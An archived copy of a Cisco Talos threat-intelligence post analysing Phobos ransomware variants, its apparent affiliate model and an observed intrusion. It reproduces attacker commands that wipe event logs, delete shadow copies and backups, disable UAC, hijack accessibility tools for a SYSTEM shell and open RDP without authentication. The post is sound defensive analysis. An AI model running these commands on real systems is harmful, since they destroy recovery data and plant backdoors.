{
	"id": "b1f630e8-1051-4941-a55d-387d451b8755",
	"created_at": "2026-04-06T01:31:12.68062Z",
	"updated_at": "2026-04-10T03:21:48.003746Z",
	"deleted_at": null,
	"sha1_hash": "b9df2ed4d5cdfa44df9f118b431749aac46e3c6b",
	"title": "Understanding the Phobos affiliate structure and activity",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 232894,
	"plain_text": "Understanding the Phobos affiliate structure and activity\r\nBy Guilherme Venere\r\nPublished: 2023-11-17 · Archived: 2026-04-06 00:51:47 UTC\r\nFriday, November 17, 2023 08:01\r\nCisco Talos recently identified the most prolific Phobos variants, common affiliate tactics, techniques and\r\nprocedures (TTPs), and characteristics of the Phobos affiliate structure, based on observed Phobos activity\r\nand analysis of over 1,000 Phobos samples from VirusTotal dating back to 2019.\r\nWe assess with moderate confidence Eking, Eight, Elbie, Devos and Faust are the most common Phobos\r\nvariants, as they appeared most frequently across the samples we analyzed. \r\nThe affiliates use similar TTPs to deploy Phobos and commonly target high-value servers, likely to\r\npressure victims into paying the ransom. \r\nWe assess with moderate confidence that the Phobos ransomware is closely managed by a central authority,\r\nas there is only one private key capable of decryption for all campaigns we observed.\r\nThere are also indications that Phobos may be sold as a ransomware-as-a-service (RaaS). We discovered\r\nhundreds of contact emails and IDs associated with Phobos campaigns, indicating the malware has a\r\ndispersed affiliate base, which is commonly seen among RaaS affiliates.\r\nIdentifying the most prolific Phobos variants\r\nPhobos ransomware is an evolution of the Dharma/Crysis ransomware and, since it was first observed in 2019, has\r\nundergone only minimal developments despite its popularity among cybercriminal groups. This is a continuation\r\nof our analysis on Phobos ransomware, previously addressed in a blog on the ransomware group 8Base.\r\nTalos identified five of the most prolific variants of the Phobos ransomware family, based on the volume of\r\nsamples in VirusTotal. We examined several variations in the malware builder’s configuration settings, as this was\r\nhttps://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 1 of 11\n\nthe only distinguishing feature among the samples analyzed. The samples all contained the same source code and\r\nwere configured to avoid encrypting files that other Phobos affiliated already locked, but the configuration\r\nchanged slightly depending on the variant being deployed. \r\nFor example, a Phobos sample deployed by the 8Base ransomware group contained a list of other Phobos variants\r\nthat should not be encrypted, as seen below. A common trend for this configuration entry among all samples is that\r\nthe group behind that specific sample had their name added to the beginning of the list.\r\nList of file extensions to be ignored by the encryption loop with names of previous campaigns.\r\nOnce we extracted the samples’ configuration settings and identified the Phobos variant, Talos determined the\r\nmost active Phobos affiliates by matching the most commonly observed variants with the unique IDs associated\r\nwith each Phobos ransomware campaign. \r\nEking: Active since at least 2019, usually targets users in the Asia-Pacific region.\r\nEight: Believed to be an older campaign run by the same group running 8Base now.\r\nElbie: Also seen targeting users in the APAC region and active since 2022.\r\nDevos: Although this group has been active since 2019, not much has been written about it in terms of\r\nvictimology or TTPs.\r\nFaust: Another variant active since 2022 that does not target specific industries or regions.\r\nThe only differences between the samples of each variant are generally the contact email addresses used in the file\r\nextension for encrypted files, and the ransom note embedded in one of the settings, with all other settings being\r\nthe same. The file extension used in all Phobos variants we analyzed follows the same template as the example\r\nshown below, where \u003c\u003cID\u003e\u003e is replaced by the victim’s machine drive serial number. The next number is an\r\nidentifier for the current campaign, then an email used to contact the ransomware actors is listed, and finally, the\r\nextension representing the variant is appended.\r\n.id[\u003c\u003e-3253].[musonn@airmail[.]cc].eking\r\nWe defanged the email address for readers’ security, but the remaining square brackets are part of the actual\r\nextension used in all variants.\r\nhttps://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 2 of 11\n\nThese variants have used hundreds of different contact emails over the past few years, as we can see in the graph\r\nbelow:\r\nCount of contact emails in use by each Phobos variant over the period of this research.\r\nThese emails are generally created using free or secure email providers, shown below:\r\nMost common email providers in use for Phobos ransomware.\r\nIn some cases, we have also seen affiliates using instant messaging services such as ICQ, Jabber and QQ to\r\nsupport their operations. The graph below illustrates the different providers chosen by the actors for each variant:\r\nDevos Eight Elbie Eking Faust\r\nemail[.]tg gmx[.]com tutanota[.]com tutanota[.]com gmx[.]com\r\nhttps://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 3 of 11\n\ncock[.]li aol[.]com onionmail[.]org airmail[.]cc tutanota[.]com\r\nprotonmail[.]com protonmail[.]com tuta[.]io aol[.]com onionmail[.]org\r\nlibertymail[.]net tutanota[.]com techmail[.]info firemail[.]cc waifu[.]club\r\nqq[.]com onionmail[.]org cock[.]li tuta[.]io tuta[.]io\r\npressmail[.]ch cock[.]li privatemail[.]com protonmail[.]com gmail[.]com\r\nmedmail[.]ch keemail[.]me gmail[.]com cock[.]li airmail[.]cc\r\ntutanota[.]com mailfence[.]com yandex[.]ru criptext[.]com mailfence[.]com\r\ncumallover[.]me zohomail[.]eu msgsafe[.]io ctemplar[.]com xmpp[.]jp\r\nairmail[.]cc zohomail[.]com cyberfear[.]com gmx[.]com zohomail[.]eu\r\ncountermail[.]com ICQ@HONESTHORSE aol[.]com techmail[.]info cock[.]li\r\nmailfence[.]com ICQ@VIRTUALHORSE msgsafe[.]io zohomail[.]com\r\nmail[.]fr lenta[.]ru\r\nproton[.]me\r\nprivatemail[.]com\r\nWe observed Devos affiliates using QQ[.]com, a Chinese instant message application, and eight affiliates using\r\nICQ, an instant message service currently owned by a Russian company. We also saw the use of service providers\r\nhttps://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 4 of 11\n\nthat are considered to be more secure than others, like Proton Mail. This diversity of providers further supports our\r\nassessment that Phobos has a dispersed affiliate base and may be operating as a RaaS. \r\nBecause of the varied use of the email service providers listed above, and the sheer number of different contact\r\nemails in use for each variant, Talos assesses with moderate confidence that multiple threat actors are behind each\r\nof these variants instead of a single threat actor moving to different providers to avoid being banned.\r\nObserved tactics, techniques and procedures in Phobos intrusions\r\nIn early 2023, Talos observed an intrusion associated with the “Elbie” variant of Phobos. In this attack, the threat\r\nactor targeted the organization’s exchange server and then moved laterally, attempting to compromise additional\r\nserver-side infrastructure including backup servers, database servers and hypervisor hosts. Rather than attempting\r\nto deploy the ransomware to a large number of systems concurrently, the attackers appeared to focus on specific\r\ninfrastructure and attempted to deploy the ransomware on each system individually. We believe this is because\r\nPhobos affiliates usually go after high-value servers in the victim’s network as a way to increase the damage and\r\nchance of a payout.\r\nAfter gaining initial access to the organization’s exchange server, the attackers created a working directory in the\r\ncompromised user’s Desktop directory and attempted to drop various tools including, but not limited to:\r\nProcess Hacker: A process visualization tool which also contains a kernel mode driver used by malicious\r\nactors sometimes to delete files, services and kill processes.\r\nAutomim: This toolkit enables automated credential collection on compromised hosts and includes the\r\nLaZagne and Mimikatz utilities.\r\nIObit File Unlocker: A tool used to remove a lock on files open by other applications, used by malicious\r\nactors to increase the chance of encrypting files like databases, open documents and similar files that are\r\nusually kept open.\r\nNirsoft Password Recovery Toolkit: A toolkit used to extract passwords for common applications like\r\nbrowsers and email clients.\r\nNetwork Scanner (NS.exe): An executable used to scan the network for open services and move laterally\r\nover the network.\r\nAngry IP Scanner: A tool used to scan the network for open services and identify network information for\r\nthe machines found.\r\nThe attacker also dropped a variety of batch files responsible for various post-compromise activities.\r\nOne batch file clears Windows event logs on compromised systems to minimize forensic artifacts and make\r\ndetection more difficult:\r\nFOR /F \"delims=\" %%I IN ('WEVTUTIL EL') DO (WEVTUTIL CL \"%%I\")\r\nAnother was responsible for deleting Volume shadow copies, likely to make recovery following Phobos\r\ndeployment more difficult:\r\nvssadmin delete shadows /all /quiet\r\nwmic shadowcopy delete\r\nhttps://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 5 of 11\n\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nbcdedit /set {default} recoveryenabled no\r\nwbadmin delete catalog -quiet\r\nexit\r\nThe script above is included in the Phobos configuration as we noted in our previous blog, which is extracted and\r\nsaved as a temporary .BAT file before the encryption process starts.\r\nAdditionally, a batch file was created to configure the Windows Registry keys that enable the accessibility features\r\npresent on the Windows logon screen to spawn a SYSTEM-level command prompt without requiring previous\r\nauthentication. This may have been used as a persistence mechanism, allowing the attacker to regain full control\r\nof systems via RDP later in the attack. \r\nFirst, the script disables User Account Control (UAC) on the system by setting the following Registry entry:\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v EnableLUA /t REG_DWORD /d\r\n0 /f\r\nNext, the script sets the Image File Execution Options debugger entry for various accessibility features to the\r\nWindows Command Processor. This allows an attacker to execute an elevated command shell on the system by\r\ninvoking the accessibility features from the Windows logon screen. Any time one of these applications is\r\nlaunched, the debugging application specified is launched with elevated permissions instead, which in this case, is\r\nthe Windows command processor. \r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f\r\n/v Debugger /t REG_SZ /d \"%windir%\\system32\\cmd.exe\"\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\"\r\n/f /v Debugger /t REG_SZ /d \"%windir%\\system32\\cmd.exe\"\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\"\r\n/f /v Debugger /t REG_SZ /d \"%windir%\\system32\\cmd.exe\"\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\"\r\n/f /v Debugger /t REG_SZ /d \"%windir%\\system32\\cmd.exe\"\r\nFinally, the script configures various Registry entries responsible for enabling RDP and disabling network-level\r\nauthentication. \r\nREG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" /f /v\r\nfDenyTSConnections /t REG_DWORD /d \"00000000\"\r\nREG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" /f /v\r\nfAllowUnsolicited /t REG_DWORD /d \"00000001\"\r\nREG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" /f /v\r\nUserAuthentication /t REG_DWORD /d \"00000000\"\r\nhttps://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 6 of 11\n\nREG ADD \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /f\r\n/v SecurityLayer /t REG_DWORD /d \"00000001\"\r\nAn additional script dropped by the threat actor was responsible for making the following service configuration\r\nchanges on compromised systems:\r\nsc config Dnscache start= auto\r\nnet start Dnscache\r\nsc config SSDPSRV start= auto\r\nnet start SSDPSRV\r\nsc config FDResPub start= auto\r\nnet start FDResPub\r\nsc config upnphost start= auto\r\nnet start upnphost\r\nFile-sharing was enabled on compromised hosts via the following command execution:\r\ndism /online /enable-feature /featurename:File-Services /NoRestart\r\nThe attacker also attempted to uninstall endpoint protection software on compromised hosts to minimize detection\r\nof various components used throughout the attack and prevent alerting security staff. \r\nOnce the defenses were disabled and the persistence mechanisms enabled, the threat actor deployed the Phobos\r\nransomware, encrypting the files in the server. In this case, the variant we observed during the infection was part\r\nof the “Elbie” campaign and displayed the same behavior we described in our previous blog. At the end of the\r\nprocess, the ransom note “info.hta” was dropped to the user’s Desktop with details on how to contact the attacker:\r\nhttps://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 7 of 11\n\nExample of Phobos info.hta displaying the contact address.\r\nUnveiling the developers and affiliates behind Phobos\r\nThrough our analysis of Phobos campaigns and malware samples, we made several discoveries that helped shed\r\nlight on mysteries surrounding the ransomware’s little-known affiliate structure and developers.\r\nThere is some indication that Phobos may be a RaaS, due to the variation in email addresses we observed. Each\r\nPhobos variant from VirusTotal was associated with at least a dozen emails that were provided to victims to\r\nmaintain contact, and some had close to 200 unique email addresses with various domains. In some instances,\r\nICQ and Jabber were used as the main contact address. While it’s possible that there is a single group behind\r\nPhobos, it would be uncommon to have a threat actor change their contact email address so often. This would take\r\nextra time and effort while many ransomware campaigns very successfully use just a few contact addresses. For\r\nexample, when we observed the ransomware group 8base using Phobos as described in our other blog, they only\r\nused a single contact email, “support@rexsdata[.]pro”.\r\nWe also assess that Phobos is likely closely managed by a central authority that controls the ransomware’s private\r\ndecryptor key. For each file Phobos decides to encrypt, it generates a random AES key to use in the encryption,\r\nthen encrypts this key along with some metadata with an RSA key present in the configuration data, and saves this\r\ndata at the end of the encrypted file. That means in order to decrypt the file, one needs the private key\r\ncorresponding to that public RSA key.\r\nhttps://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 8 of 11\n\nEvery Phobos sample we analyzed contains the same public RSA key in its configuration data, implying there is\r\nonly one private key capable of decryption. We assess that a single threat actor controls the private key as every\r\nsingle sample we analyzed contains the same public key. It’s possible the Phobos developer offers the decryption\r\nservice to their affiliates for a cut of their proceedings. \r\nDuring our research, we did find variants of these decryptors in the wild, like this sample found in VirusTotal\r\nwhich promises to decrypt samples for the “Elbie” variant. However, the decryptor needs two pieces of\r\ninformation that are not available in the file itself, so using it to decrypt samples is not possible. \r\nPhobos decryption tool screen asks for base64-encoded data.\r\nThe first piece needed seems to be a file with a base64-encoded encrypted blob of data which seems to be the RSA\r\nprivate key used to decrypt the samples. The second piece of information needed is a password which is used to\r\ndecrypt the content of this blob. So, it may be possible for the RSA private key to be recovered if these two pieces\r\nof data are found, shared by a victim who paid for the decryption or leaked it in the wild. \r\nFurther supporting our assessment that Phobos is run by a central authority, is how meticulously the ransomware’s\r\nextension block lists are updated. As we stated previously, Phobos avoids encrypting files that were previously\r\nlocked by other Phobos affiliates. This is based on a file extension block list in the ransomware’s configuration\r\nsettings. The extension blocklists appear to tell a story of which groups used that same base sample over time.\r\nWhen a malware builder tool usually generates a binary for a campaign, it does so based on a fixed and clean\r\n“stub” binary, which is then populated with whatever payload of configuration is necessary for that current\r\nbuild. This is not what happens with Phobos.\r\nThe extension block lists found in the many Phobos samples Talos analyzed are continually updated with new files\r\nthat have been locked in previous Phobos campaigns. This may support the idea that there is a central authority\r\nbehind the builder who keeps track of who used Phobos in the past. The intent could be to prevent Phobos\r\naffiliates from interfering with one another's operations.\r\nCoverage\r\nhttps://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 9 of 11\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nClamAV detections are available for this threat:\r\nWin.Packed.Zusy\r\nWin.Ransomware.8base\r\nWin.Downloader.Generic\r\nWin.Ransomware.Ulise\r\nIOCs\r\nIndicators of Compromise associated with this threat can be found here.\r\nhttps://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 10 of 11\n\nSource: https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nhttps://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/"
	],
	"report_names": [
		"understanding-the-phobos-affiliate-structure"
	],
	"threat_actors": [],
	"ts_created_at": 1775439072,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b9df2ed4d5cdfa44df9f118b431749aac46e3c6b.pdf",
		"text": "https://archive.orkl.eu/b9df2ed4d5cdfa44df9f118b431749aac46e3c6b.txt",
		"img": "https://archive.orkl.eu/b9df2ed4d5cdfa44df9f118b431749aac46e3c6b.jpg"
	}
}